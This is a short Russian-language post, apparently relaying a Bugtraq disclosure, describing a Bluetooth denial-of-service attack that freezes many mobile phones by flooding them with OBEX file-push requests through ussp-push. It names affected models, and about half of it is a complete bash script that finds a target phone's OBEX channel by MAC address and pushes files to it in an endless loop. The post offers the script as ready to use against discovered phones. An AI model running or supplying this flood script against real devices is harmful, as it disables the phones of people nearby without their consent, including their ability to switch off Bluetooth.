В списке рассылки Bugtraq опубликовано сообщение, суть которого - в возможности проведения DoS-атаки против ряда сотовых телефонов при помощи множественных посылок файлов с использование ПО ussp-push. При использовании атаки телефон жертвы начинает выдавать множество сообщений, требующих получить, либо отвергнуть передаваемые файлы. Так как скорость передачи достаточно высока, через определённое время телефон попросту зависает, не давая, в том числе, отключить Bluetooth. В качестве уязвимых сотовых телефонов называются следующие модели: Sony Ericsson K700i, Nokia N70, Motorola MOTORAZR V3, Sony Ericsson W810i, LG Chocolate KG800, хотя автор утверждает об уязвимости практически всех телефонов с поддержкой Bluetooth. Используя простейший Bluetooth-донгл удалось одновременно проводить атаку на 3 телефона. Приводится текст скрипта, задав которому в качестве параметра MAC-адрес обнаруженного телефона, можно провести атак. Code: #!/bin/bash checkOPUSH() { MAC=$1 OCHAN=$(sdptool search --bdaddr $MAC OPUSH | grep Channel:) if test "$OCHAN" != "" then OCHAN=$(echo $OCHAN | awk '/Channel:/ { print $2 }') return $OCHAN fi return 0 } if test $# -ne 2 then echo "Usage: $0 <bdaddr> <filename>" exit 127 fi MAC=$1 FILENAME=$2 checkOPUSH $1 OCHAN=$? if test $OCHAN -eq 0 then echo "Couldn't connect to $MAC via OBEX push." exit 127 fi while true do ./ussp-push $MAC@$OCHAN $FILENAME $FILENAME done (с)лито